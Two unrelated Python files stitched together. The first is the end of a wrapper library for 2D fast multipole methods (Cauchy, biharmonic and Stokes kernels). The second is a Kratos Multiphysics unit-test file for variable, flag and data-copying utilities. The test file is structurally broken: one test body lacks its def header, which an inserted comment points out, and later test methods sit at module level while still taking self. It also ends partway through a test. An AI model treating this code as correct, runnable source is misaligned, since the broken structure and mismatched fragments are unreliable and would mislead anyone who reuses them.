    grad, ifgrad = check_output(array_source_gradient,
        compute_source_gradient, (ns,), complex)
    hess, ifhess = check_output(array_source_hessian,
        compute_source_hessian, (ns,), complex)
    target, iftarget, nt = check_array(target, (2,None), float, 'target', True)
    if not iftarget:
        if compute_target_potential or compute_target_gradient \
                or compute_target_hessian:
            raise Exception('If asking for a target quantity, '
                'target must be given')
    pottarg, ifpottarg = check_output(array_target_potential,
        compute_target_potential, (nt,), complex)
    gradtarg, ifgradtarg = check_output(array_target_gradient,
        compute_target_gradient, (nt,), complex)
    hesstarg, ifhesstarg = check_output(array_target_hessian,
        compute_target_hessian, (nt,), complex)
    ier = int(0)
    iprec = initialize_precision(precision)
    if direct:
        # O(ns*nt) direct summation; argument order fixed by the Fortran API
        c2dpartdirect(ns, source, ifcharge, charge, ifdipstr, dipstr, ifpot,
            pot, ifgrad, grad, ifhess, hess, nt, target, ifpottarg, pottarg,
            ifgradtarg, gradtarg, ifhesstarg, hesstarg)
    else:
        cfmm2dparttarg(ier, iprec, ns, source, ifcharge, charge, ifdipstr,
            dipstr, ifpot, pot, ifgrad, grad, ifhess, hess, nt, target,
            ifpottarg, pottarg, ifgradtarg, gradtarg, ifhesstarg, hesstarg)
    # package requested quantities into the output dict
    out = get_fmmlib2d_output_cauchy(
        compute_source_potential,
        compute_source_gradient,
        compute_source_hessian,
        pot, grad, hess,
        compute_target_potential,
        compute_target_gradient,
        compute_target_hessian,
        pottarg, gradtarg, hesstarg,
        ier
    )
    return out
def BFMM(
    source,
    target = None,
    charge = None,
    dipole1 = None,
    dipole2 = None,
    compute_source_velocity = False,
    compute_source_analytic_gradient = False,
    compute_source_anti_analytic_gradient = False,
    compute_target_velocity = False,
    compute_target_analytic_gradient = False,
    compute_target_anti_analytic_gradient = False,
    array_source_velocity = None,
    array_source_analytic_gradient = None,
    array_source_anti_analytic_gradient = None,
    array_target_velocity = None,
    array_target_analytic_gradient = None,
    array_target_anti_analytic_gradient = None,
    precision = 4,
):
    """
    Pythonic interface for Biharmonic FMM

    Wraps the function:
        bhfmm2dparttarg

    Parameters:
        source (required), float(2, ns): location of sources
        target (optional), float(2, nt): location of targets
        charge (optional), complex(ns): charges at source locations
        dipole1 (optional), complex(ns): dipole1 at source locations
        dipole2 (optional), complex(ns): dipole2 at source locations
            dipole1 and dipole2 must be given together or not at all
        compute_#_* (optional), bool: whether to compute * at # locations
        array_#_* (optional), complex(n): preallocated arrays for result
            n = ns for #=source, nt for #=target
            if these arrays are not provided, are not of the correct size, not
            of the correct type, or not fortran contiguous, new arrays for
            the results will be allocated at runtime
        precision (optional), float: precision, see documentation for FMM

    Returns:
        Dictionary:
            'ier': (integer) output code
                0:  successful completion of code
                4:  failure to allocate memory for tree
                8:  failure to allocate memory for FMM workspaces
                16: failure to allocate memory for multipole/local
                    expansions
            'source': (quantities computed at source locations)
                'u'                        : complex(ns), potential
                'u_analytic_gradient'      : complex(ns), analytic gradient
                'u_anti_analytic_gradient' : complex(ns), anti-analytic gradient
            'target': (quantities computed at target locations):
                same as above, but for target related things
                ns replaced by nt, in the shapes
        Some notes about the output:
            1) If array_#_* is provided and was acceptable, the code:
                "array_#_* is output['#']['*']"
                will return True
                If the array was provided but incorrect, then the code
                will return False
            2) Entries of the dictionary will only exist if they were asked for
                i.e. if no 'source' quantities were requested, the 'source'
                dictionary will not exist
    """
    source, _, ns = check_array(source, (2,None), float, 'source', True)
    charge, ifcharge = check_array(charge, (ns,), complex, 'charge')
    dipole1, ifdipole1 = check_array(dipole1, (ns,), complex, 'dipole1')
    dipole2, ifdipole2 = check_array(dipole2, (ns,), complex, 'dipole2')
    # the two dipole densities enter the kernel together: all or nothing
    if (ifdipole1 or ifdipole2) and not (ifdipole1 and ifdipole2):
        raise Exception('If one of the dipoles is set, then the other must '
            'also be set.')
    ifdipole = ifdipole1
    # accept preallocated output arrays if usable, otherwise allocate fresh
    vel, ifvel = check_output(array_source_velocity,
        compute_source_velocity, (ns,), complex)
    grada, ifgrada = check_output(array_source_analytic_gradient,
        compute_source_analytic_gradient, (ns,), complex)
    gradaa, ifgradaa = check_output(array_source_anti_analytic_gradient,
        compute_source_anti_analytic_gradient, (ns,), complex)
    target, iftarget, nt = check_array(target, (2,None), float, 'target', True)
    if not iftarget:
        if compute_target_velocity or compute_target_analytic_gradient \
                or compute_target_anti_analytic_gradient:
            raise Exception('If asking for a target quantity, '
                'target must be given')
    veltarg, ifveltarg = check_output(array_target_velocity,
        compute_target_velocity, (nt,), complex)
    gradatarg, ifgradatarg = check_output(array_target_analytic_gradient,
        compute_target_analytic_gradient, (nt,), complex)
    gradaatarg, ifgradaatarg = check_output(array_target_anti_analytic_gradient,
        compute_target_anti_analytic_gradient, (nt,), complex)
    ier = int(0)
    iprec = initialize_precision(precision)
    # argument order fixed by the Fortran API
    bhfmm2dparttarg(ier, iprec, ns, source, ifcharge, charge, ifdipole, dipole1,
        dipole2, ifvel, vel, ifgrada, grada, ifgradaa, gradaa, nt, target,
        ifveltarg, veltarg, ifgradatarg, gradatarg, ifgradaatarg, gradaatarg)
    # assemble the output dictionary; sub-dicts exist only when requested
    output = {}
    any_source = compute_source_velocity or compute_source_analytic_gradient \
        or compute_source_anti_analytic_gradient
    if any_source:
        source_output = {}
        if compute_source_velocity:
            source_output['u'] = vel
        if compute_source_analytic_gradient:
            source_output['u_analytic_gradient'] = grada
        if compute_source_anti_analytic_gradient:
            source_output['u_anti_analytic_gradient'] = gradaa
        output['source'] = source_output
    any_target = compute_target_velocity or compute_target_analytic_gradient \
        or compute_target_anti_analytic_gradient
    if any_target:
        target_output = {}
        if compute_target_velocity:
            target_output['u'] = veltarg
        if compute_target_analytic_gradient:
            target_output['u_analytic_gradient'] = gradatarg
        if compute_target_anti_analytic_gradient:
            target_output['u_anti_analytic_gradient'] = gradaatarg
        output['target'] = target_output
    output['ier'] = ier
    return output
def SFMM(
    source,
    target = None,
    forces = None,
    dipstr = None,
    dipvec = None,
    compute_source_velocity = False,
    compute_source_stress = False,
    compute_target_velocity = False,
    compute_target_stress = False,
    precision = 4,
):
    """
    Pythonic interface for Stokes FMM

    Built on top of the biharmonic FMM wrapper (BFMM): the Stokes densities
    are translated to complex biharmonic densities, and the biharmonic
    outputs are translated back into velocity/stress quantities.

    Parameters:
        source (required), float(2, ns): location of sources
        target (optional), float(2, nt): location of targets
        forces (optional), float(2, ns): forces at source locations
        dipstr (optional), float(2, ns): dipole strengths at source locations
        dipvec (optional), float(2, ns): orientation vector of dipoles
            if dipstr is set, then dipvec must be, also
        compute_#_* (optional), bool: whether to compute * at # locations
        precision (optional), float: precision, see documentation for FMM

    Returns:
        Dictionary:
            'source': (quantities computed at source locations)
                'u'   : float(ns), velocity, x-direction
                'v'   : float(ns), velocity, y-direction
                'u_x' : float(ns), x derivative of u
                'u_y' : float(ns), y derivative of u
                'v_x' : float(ns), x derivative of v
                'v_y' : float(ns), y derivative of v
                'p'   : float(ns), pressure
            'target': (quantities computed at target locations):
                same as above, but for target related things
                ns replaced by nt, in the shapes
        Some notes about the output:
            1) Entries of the dictionary will only exist if they were asked for
                i.e. if no 'source' quantities were requested, the 'source'
                dictionary will not exist
    """
    source, _, ns = check_array(source, (2,None), float, 'source', True)
    forces, ifforces = check_array(forces, (2, ns), float, 'forces')
    dipstr, ifdipstr = check_array(dipstr, (2, ns), float, 'dipstr')
    dipvec, ifdipvec = check_array(dipvec, (2, ns), float, 'dipvec')
    if ifdipstr and not ifdipvec:
        raise Exception('If dipstr is provided, dipvec must be also')
    # construct inputs for the biharmonic FMM:
    # real 2-vectors are packed as complex scalars (x + i*y)
    sca = 1.0/(4.0*np.pi)
    if ifforces:
        tc = forces[0] + 1j*forces[1]
        cc = -0.5j*tc*sca
    else:
        cc = None
    if ifdipstr:
        dsc = 1j*(dipstr[0] + 1j*dipstr[1])
        dvc = dipvec[0] + 1j*dipvec[1]
        d1 = dsc*dvc*sca
        d2 = (dsc*np.conj(dvc) - np.conj(dsc)*dvc)*sca
    else:
        d1 = None
        d2 = None
    target, iftarget, nt = check_array(target, (2,None), float, 'target', True)
    if not iftarget:
        if compute_target_velocity or compute_target_stress:
            raise Exception('If asking for a target quantity, '
                'target must be given')
    # stress requires both the analytic and anti-analytic gradients,
    # hence compute_*_stress is passed for both gradient flags
    bout = BFMM(source,
        target,
        cc,
        d1,
        d2,
        compute_source_velocity,
        compute_source_stress,
        compute_source_stress,
        compute_target_velocity,
        compute_target_stress,
        compute_target_stress)
    output = {}
    any_source = compute_source_velocity or compute_source_stress
    if any_source:
        source_output = {}
        if compute_source_velocity:
            vel = -1.0j*bout['source']['u']
            if ifforces:
                # self-interaction correction at the source points
                correction = np.sum(cc) - cc
                vel += 1j*correction
            source_output['u'] = vel.real
            source_output['v'] = vel.imag
        if compute_source_stress:
            # recover velocity gradients and pressure from the biharmonic
            # analytic / anti-analytic gradients
            agrad = bout['source']['u_analytic_gradient']
            aagrad = bout['source']['u_anti_analytic_gradient']
            w = -4*agrad.real
            w2 = -2*aagrad.real
            ux = aagrad.imag
            vy = -ux           # incompressibility: v_y = -u_x
            vx = 0.5*(w+w2)
            uy = vx - w
            p = -4*agrad.imag
            source_output['u_x'] = ux
            source_output['u_y'] = uy
            source_output['v_x'] = vx
            source_output['v_y'] = vy
            source_output['p'] = p
        output['source'] = source_output
    any_target = compute_target_velocity or compute_target_stress
    if any_target:
        target_output = {}
        if compute_target_velocity:
            vel = -1.0j*bout['target']['u']
            if ifforces:
                vel += 1j*np.sum(cc)
            target_output['u'] = vel.real
            target_output['v'] = vel.imag
        if compute_target_stress:
            agrad = bout['target']['u_analytic_gradient']
            aagrad = bout['target']['u_anti_analytic_gradient']
            w = -4*agrad.real
            w2 = -2*aagrad.real
            ux = aagrad.imag
            vy = -ux
            vx = 0.5*(w+w2)
            uy = vx - w
            p = -4*agrad.imag
            target_output['u_x'] = ux
            target_output['u_y'] = uy
            target_output['v_x'] = vx
            target_output['v_y'] = vy
            target_output['p'] = p
        output['target'] = target_output
    return output
# Dispatch table: user-facing FMM kind name -> wrapper function.
# 'laplace' is an alias for 'laplace-real' (RFMM).
function_map = {
    'helmholtz' : HFMM,
    'laplace-complex' : LFMM,
    'laplace-real' : RFMM,
    'laplace' : RFMM,
    'cauchy' : ZFMM,
    'cauchy-general' : CFMM,
    'biharmonic' : BFMM,
    'stokes' : SFMM,
}
|
from __future__ import print_function, absolute_import, division
# Importing the Kratos Library
import KratosMultiphysics
import KratosMultiphysics.KratosUnittest as KratosUnittest
import math
import os
def GetFilePath(fileName):
    """Return the path of *fileName* resolved relative to this script's directory."""
    this_dir = os.path.dirname(os.path.realpath(__file__))
    return os.path.join(this_dir, fileName)
class TestVariableUtils(KratosUnittest.TestCase):
    def test_copy_model_part_nodal_var(self):
        """Check that CopyModelPartNodalVar copies historical nodal values
        (scalar and vector variables, both buffer steps) from an origin
        model part to a destination model part with matching meshes."""
        current_model = KratosMultiphysics.Model()
        ##set the origin model part
        origin_model_part = current_model.CreateModelPart("OriginModelPart")
        origin_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
        origin_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
        # buffer size 2 so values can be stored at steps 0 and 1
        origin_model_part.SetBufferSize(2)
        model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
        model_part_io.ReadModelPart(origin_model_part)
        ##set the destination model part (same mesh file as the origin)
        destination_model_part = current_model.CreateModelPart("DestinationModelPart")
        destination_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
        destination_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
        destination_model_part.SetBufferSize(2)
        model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
        model_part_io.ReadModelPart(destination_model_part)
        ##set the values in the origin model part
        # coordinate-dependent values so each node carries a distinct datum
        for node in origin_model_part.Nodes:
            node.SetSolutionStepValue(KratosMultiphysics.VISCOSITY, 0, node.X + node.Y)
            node.SetSolutionStepValue(KratosMultiphysics.VISCOSITY, 1, 2.0 * node.X + 3.0 * node.Y)
            node.SetSolutionStepValue(KratosMultiphysics.DISPLACEMENT, 0, [node.X ** 2, 0.0, 0.0])
            node.SetSolutionStepValue(KratosMultiphysics.DISPLACEMENT, 1, [node.X, node.Y, node.Z])
        ##copy the values to the destination model part (each buffer step separately)
        KratosMultiphysics.VariableUtils().CopyModelPartNodalVar(KratosMultiphysics.VISCOSITY, origin_model_part, destination_model_part, 0)
        KratosMultiphysics.VariableUtils().CopyModelPartNodalVar(KratosMultiphysics.VISCOSITY, origin_model_part, destination_model_part, 1)
        KratosMultiphysics.VariableUtils().CopyModelPartNodalVar(KratosMultiphysics.DISPLACEMENT, origin_model_part, destination_model_part, 0)
        KratosMultiphysics.VariableUtils().CopyModelPartNodalVar(KratosMultiphysics.DISPLACEMENT, origin_model_part, destination_model_part, 1)
        ##check the copied values
        for node in destination_model_part.Nodes:
            self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.VISCOSITY, 0), node.X + node.Y)
            self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.VISCOSITY, 1), 2.0 * node.X + 3.0 * node.Y)
            self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_X, 0), node.X ** 2)
            self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_X, 1), node.X)
    def test_copy_model_part_nodal_var_to_non_historical_var(self):
        """Check that CopyModelPartNodalVarToNonHistoricalVar copies historical
        nodal values of the origin model part into the non-historical (data
        value) container of the destination model part, including the
        variant that copies into a differently named variable."""
        ##set the origin model part
        current_model = KratosMultiphysics.Model()
        origin_model_part = current_model.CreateModelPart("OriginModelPart")
        origin_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
        origin_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
        origin_model_part.SetBufferSize(2)
        model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
        model_part_io.ReadModelPart(origin_model_part)
        ##set the destination model part (same mesh file as the origin)
        destination_model_part = current_model.CreateModelPart("DestinationModelPart")
        destination_model_part.SetBufferSize(2)
        destination_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
        destination_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
        model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
        model_part_io.ReadModelPart(destination_model_part)
        ##set the values in the origin model part
        for node in origin_model_part.Nodes:
            node.SetSolutionStepValue(KratosMultiphysics.VISCOSITY, 0, node.X + node.Y)
            node.SetSolutionStepValue(KratosMultiphysics.DISPLACEMENT, 1, [node.X, node.Y, node.Z])
        ## initialize the containers in destination model part (otherwise the operation is not threadsafe!)
        for node in destination_model_part.Nodes:
            node.SetValue(KratosMultiphysics.VISCOSITY, 0)
            node.SetValue(KratosMultiphysics.DISPLACEMENT, KratosMultiphysics.Array3())
            node.SetValue(KratosMultiphysics.VELOCITY, KratosMultiphysics.Array3())
        ##copy the values to the destination model part
        # last argument is the history buffer step to read from the origin
        KratosMultiphysics.VariableUtils().CopyModelPartNodalVarToNonHistoricalVar(KratosMultiphysics.VISCOSITY, origin_model_part, destination_model_part, 0)
        KratosMultiphysics.VariableUtils().CopyModelPartNodalVarToNonHistoricalVar(KratosMultiphysics.DISPLACEMENT, origin_model_part, destination_model_part, 1)
        # overload copying DISPLACEMENT (origin) into VELOCITY (destination)
        KratosMultiphysics.VariableUtils().CopyModelPartNodalVarToNonHistoricalVar(KratosMultiphysics.DISPLACEMENT, KratosMultiphysics.VELOCITY, origin_model_part, destination_model_part, 1)
        ##check the copied values
        for node in destination_model_part.Nodes:
            self.assertEqual(node.GetValue(KratosMultiphysics.VISCOSITY), node.X + node.Y)
            self.assertEqual(node.GetValue(KratosMultiphysics.VELOCITY_X), node.X)
            self.assertEqual(node.GetValue(KratosMultiphysics.DISPLACEMENT_X), node.X)
    def test_copy_model_part_elemental_var(self):
        """Check that CopyModelPartElementalVar copies elemental data values
        (scalar and vector) from an origin model part to a destination
        model part with matching meshes."""
        current_model = KratosMultiphysics.Model()
        ##set the origin model part
        origin_model_part = current_model.CreateModelPart("OriginModelPart")
        origin_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
        origin_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
        model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
        model_part_io.ReadModelPart(origin_model_part)
        ##set the destination model part (same mesh file as the origin)
        destination_model_part = current_model.CreateModelPart("DestinationModelPart")
        destination_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
        destination_model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
        model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
        model_part_io.ReadModelPart(destination_model_part)
        ##set the values in the origin model part
        # Id-dependent values so each element carries a distinct datum
        for element in origin_model_part.Elements:
            element.SetValue(KratosMultiphysics.DENSITY, element.Id*100)
            element.SetValue(KratosMultiphysics.VOLUME_ACCELERATION, [element.Id*100, 0.0, 0.0])
        ##copy the values to the destination model part
        KratosMultiphysics.VariableUtils().CopyModelPartElementalVar(KratosMultiphysics.DENSITY, origin_model_part, destination_model_part)
        KratosMultiphysics.VariableUtils().CopyModelPartElementalVar(KratosMultiphysics.VOLUME_ACCELERATION, origin_model_part, destination_model_part)
        ##check the copied values
        for element in destination_model_part.Elements:
            self.assertEqual(element.GetValue(KratosMultiphysics.DENSITY), element.Id*100)
            self.assertEqual(element.GetValue(KratosMultiphysics.VOLUME_ACCELERATION)[0], element.Id*100)
        # NOTE(review): this run of statements has no `def` header in the
        # visible source — it looks like a test method body (exercising
        # VariableUtils SetScalarVar / SetVariable for scalar, component,
        # vector and quaternion variables) whose `def test_...(self):` line
        # was lost. Confirm against the upstream file and restore the header.
        current_model = KratosMultiphysics.Model()
        ##set the model part
        model_part = current_model.CreateModelPart("Main")
        model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VELOCITY)
        model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
        model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
        model_part.AddNodalSolutionStepVariable(KratosMultiphysics.PARTITION_INDEX)
        model_part.AddNodalSolutionStepVariable(KratosMultiphysics.ORIENTATION)
        model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
        model_part_io.ReadModelPart(model_part)
        ##set the variable values
        viscosity = 0.1
        partition_index = 1
        velocity = KratosMultiphysics.Vector(3)
        velocity[0] = 2.0
        velocity[1] = 4.0
        velocity[2] = 8.0
        displacement = KratosMultiphysics.Vector(3)
        displacement[0] = 1.0
        displacement[1] = 2.0
        displacement[2] = 3.0
        orientation = KratosMultiphysics.Quaternion()
        orientation.X = 1.0
        orientation.Y = 2.0
        orientation.Z = 3.0
        orientation.W = 4.0
        # set the values on every node: scalar, per-component, vector,
        # integer and quaternion variants of the setters
        KratosMultiphysics.VariableUtils().SetScalarVar(KratosMultiphysics.VISCOSITY, viscosity, model_part.Nodes)
        KratosMultiphysics.VariableUtils().SetVariable(KratosMultiphysics.VELOCITY_X, velocity[0], model_part.Nodes)
        KratosMultiphysics.VariableUtils().SetVariable(KratosMultiphysics.VELOCITY_Y, velocity[1], model_part.Nodes)
        KratosMultiphysics.VariableUtils().SetVariable(KratosMultiphysics.VELOCITY_Z, velocity[2], model_part.Nodes)
        KratosMultiphysics.VariableUtils().SetVariable(KratosMultiphysics.DISPLACEMENT, displacement, model_part.Nodes)
        KratosMultiphysics.VariableUtils().SetVariable(KratosMultiphysics.PARTITION_INDEX, partition_index, model_part.Nodes)
        KratosMultiphysics.VariableUtils().SetVariable(KratosMultiphysics.ORIENTATION, orientation, model_part.Nodes)
        ##verify the result
        for node in model_part.Nodes:
            self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_X), 1.0)
            self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_Y), 2.0)
            self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.DISPLACEMENT_Z), 3.0)
            self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.VISCOSITY), viscosity)
            self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.ORIENTATION).X, 1.0)
            self.assertEqual(node.GetSolutionStepValue(KratosMultiphysics.ORIENTATION).W, 4.0)
def test_set_nonhistorical_variable(self):
    """Checks SetNonHistoricalVariable for scalar, vector and quaternion data
    on both nodes and conditions."""
    current_model = KratosMultiphysics.Model()
    # Build the model part and read the reference mesh
    model_part = current_model.CreateModelPart("Main")
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.ORIENTATION)
    model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
    model_part_io.ReadModelPart(model_part)

    # Values to be assigned
    visc_value = 0.1
    disp_value = KratosMultiphysics.Vector(3)
    disp_value[0] = 1.0
    disp_value[1] = 2.0
    disp_value[2] = 3.0
    quat_value = KratosMultiphysics.Quaternion()
    quat_value.X = 1.0
    quat_value.Y = 2.0
    quat_value.Z = 3.0
    quat_value.W = 4.0

    variable_utils = KratosMultiphysics.VariableUtils()
    # Assign the non-historical nodal database
    variable_utils.SetNonHistoricalVariable(KratosMultiphysics.VISCOSITY, visc_value, model_part.Nodes)
    variable_utils.SetNonHistoricalVariable(KratosMultiphysics.DISPLACEMENT, disp_value, model_part.Nodes)
    variable_utils.SetNonHistoricalVariable(KratosMultiphysics.ORIENTATION, quat_value, model_part.Nodes)
    # Check the nodal values
    for node in model_part.Nodes:
        self.assertEqual(node.GetValue(KratosMultiphysics.DISPLACEMENT_X), 1.0)
        self.assertEqual(node.GetValue(KratosMultiphysics.DISPLACEMENT_Y), 2.0)
        self.assertEqual(node.GetValue(KratosMultiphysics.DISPLACEMENT_Z), 3.0)
        self.assertEqual(node.GetValue(KratosMultiphysics.VISCOSITY), visc_value)
        self.assertEqual(node.GetValue(KratosMultiphysics.ORIENTATION).X, 1.0)
        self.assertEqual(node.GetValue(KratosMultiphysics.ORIENTATION).W, 4.0)

    # Repeat for conditions (elements would behave the same way)
    variable_utils.SetNonHistoricalVariable(KratosMultiphysics.VISCOSITY, visc_value, model_part.Conditions)
    variable_utils.SetNonHistoricalVariable(KratosMultiphysics.DISPLACEMENT, disp_value, model_part.Conditions)
    # Check the condition values
    for condition in model_part.Conditions:
        cond_disp = condition.GetValue(KratosMultiphysics.DISPLACEMENT)
        self.assertEqual(cond_disp[0], 1.0)
        self.assertEqual(cond_disp[1], 2.0)
        self.assertEqual(cond_disp[2], 3.0)
        self.assertEqual(condition.GetValue(KratosMultiphysics.VISCOSITY), visc_value)
def test_clear_nonhistorical_values(self):
    """Checks that ClearNonHistoricalData wipes previously set non-historical
    values from nodes and conditions."""
    current_model = KratosMultiphysics.Model()
    # Build the model part and read the reference mesh
    model_part = current_model.CreateModelPart("Main")
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
    model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
    model_part_io.ReadModelPart(model_part)

    # Values used to populate the database before clearing it
    visc_value = 0.1
    disp_value = KratosMultiphysics.Vector(3)
    disp_value[0] = 1.0
    disp_value[1] = 2.0
    disp_value[2] = 3.0

    variable_utils = KratosMultiphysics.VariableUtils()
    # Nodes: populate, clear and check everything is gone
    variable_utils.SetNonHistoricalVariable(KratosMultiphysics.VISCOSITY, visc_value, model_part.Nodes)
    variable_utils.SetNonHistoricalVariable(KratosMultiphysics.DISPLACEMENT, disp_value, model_part.Nodes)
    variable_utils.ClearNonHistoricalData(model_part.Nodes)
    for node in model_part.Nodes:
        self.assertFalse(node.Has(KratosMultiphysics.DISPLACEMENT))
        self.assertFalse(node.Has(KratosMultiphysics.VISCOSITY))

    # Conditions: same round trip (elements would behave the same way)
    variable_utils.SetNonHistoricalVariable(KratosMultiphysics.VISCOSITY, visc_value, model_part.Conditions)
    variable_utils.SetNonHistoricalVariable(KratosMultiphysics.DISPLACEMENT, disp_value, model_part.Conditions)
    variable_utils.ClearNonHistoricalData(model_part.Conditions)
    for condition in model_part.Conditions:
        self.assertFalse(condition.Has(KratosMultiphysics.DISPLACEMENT))
        self.assertFalse(condition.Has(KratosMultiphysics.VISCOSITY))
def test_set_flag(self):
    """Checks SetFlag, FlipFlag and ResetFlag on nodes, conditions and
    elements of the main model part and of the "Inlets" submodelpart."""
    current_model = KratosMultiphysics.Model()
    # Build the model part and read the reference mesh
    model_part = current_model.CreateModelPart("Main")
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.VISCOSITY)
    model_part.AddNodalSolutionStepVariable(KratosMultiphysics.DISPLACEMENT)
    model_part_io = KratosMultiphysics.ModelPartIO(GetFilePath("auxiliar_files_for_python_unittest/mdpa_files/test_model_part_io_read"))
    model_part_io.ReadModelPart(model_part)

    variable_utils = KratosMultiphysics.VariableUtils()
    inlets = model_part.GetSubModelPart("Inlets")

    # Set the flags
    variable_utils.SetFlag(KratosMultiphysics.VISITED, True, model_part.Nodes)
    variable_utils.SetFlag(KratosMultiphysics.VISITED, True, model_part.Conditions)
    variable_utils.SetFlag(KratosMultiphysics.VISITED, True, model_part.Elements)
    variable_utils.SetFlag(KratosMultiphysics.INLET, True, inlets.Nodes)
    variable_utils.SetFlag(KratosMultiphysics.INLET, True, inlets.Conditions)
    variable_utils.SetFlag(KratosMultiphysics.OUTLET, False, inlets.Nodes)
    variable_utils.SetFlag(KratosMultiphysics.OUTLET, False, inlets.Conditions)
    # Check the main model part flags
    for node in model_part.Nodes:
        self.assertTrue(node.Is(KratosMultiphysics.VISITED))
    for condition in model_part.Conditions:
        self.assertTrue(condition.Is(KratosMultiphysics.VISITED))
    for element in model_part.Elements:
        self.assertTrue(element.Is(KratosMultiphysics.VISITED))
    # Check the "Inlets" submodelpart flags
    for node in inlets.Nodes:
        self.assertTrue(node.Is(KratosMultiphysics.INLET))
        self.assertTrue(node.IsNot(KratosMultiphysics.OUTLET))
    for condition in inlets.Conditions:
        self.assertTrue(condition.Is(KratosMultiphysics.INLET))
        self.assertTrue(condition.IsNot(KratosMultiphysics.OUTLET))

    # Flip all the flags
    variable_utils.FlipFlag(KratosMultiphysics.VISITED, model_part.Nodes)
    variable_utils.FlipFlag(KratosMultiphysics.VISITED, model_part.Conditions)
    variable_utils.FlipFlag(KratosMultiphysics.VISITED, model_part.Elements)
    variable_utils.FlipFlag(KratosMultiphysics.INLET, inlets.Nodes)
    variable_utils.FlipFlag(KratosMultiphysics.INLET, inlets.Conditions)
    variable_utils.FlipFlag(KratosMultiphysics.OUTLET, inlets.Nodes)
    variable_utils.FlipFlag(KratosMultiphysics.OUTLET, inlets.Conditions)
    # Check the main model part flags are negated
    for node in model_part.Nodes:
        self.assertFalse(node.Is(KratosMultiphysics.VISITED))
    for condition in model_part.Conditions:
        self.assertFalse(condition.Is(KratosMultiphysics.VISITED))
    for element in model_part.Elements:
        self.assertFalse(element.Is(KratosMultiphysics.VISITED))
    # Check the "Inlets" submodelpart flags are negated
    for node in inlets.Nodes:
        self.assertFalse(node.Is(KratosMultiphysics.INLET))
        self.assertFalse(node.IsNot(KratosMultiphysics.OUTLET))
    for condition in inlets.Conditions:
        self.assertFalse(condition.Is(KratosMultiphysics.INLET))
        self.assertFalse(condition.IsNot(KratosMultiphysics.OUTLET))

    # Reset the flags (leaves them undefined)
    variable_utils.ResetFlag(KratosMultiphysics.VISITED, model_part.Nodes)
    variable_utils.ResetFlag(KratosMultiphysics.VISITED, model_part.Conditions)
    variable_utils.ResetFlag(KratosMultiphysics.VISITED, model_part.Elements)
    variable_utils.ResetFlag(KratosMultiphysics.INLET, inlets.Nodes)
    variable_utils.ResetFlag(KratosMultiphysics.INLET, inlets.Conditions)
    variable_utils.ResetFlag(KratosMultiphysics.OUTLET, inlets.Nodes)
    variable_utils.ResetFlag(KratosMultiphysics.OUTLET, inlets.Conditions)
    # Check the main model part flags are undefined
    for node in model_part.Nodes:
        self.assertFalse(node.IsDefined(KratosMultiphysics.VISITED))
    for condition in model_part.Conditions:
        self.assertFalse(condition.IsDefined(KratosMultiphysics.VISITED))
    for element in model_part.Elements:
        self.assertFalse(element.IsDefined(KratosMultiphysics.VISITED))
    # Check the "Inlets" submodelpart flags are undefined
    for node in inlets.Nodes:
        self.assertFalse(node.IsDefined(KratosMultiphysics.INLET))
        self.assertFalse(node.IsDefined(KratosMultiphysics.OUTLET))
    for condition in inlets.Conditions:
        self.assertFalse(condition.IsDefined(KratosMultiphysics.INLET))
        self.assertFalse(condition.IsDefined(KratosMultiphysics.OUTLET))
def test_copy_var(self):
    """Checks CopyScalarVar / CopyVectorVar between historical variables."""
    current_model = KratosMultiphysics.Model()
    # Build the model part and read the reference mesh
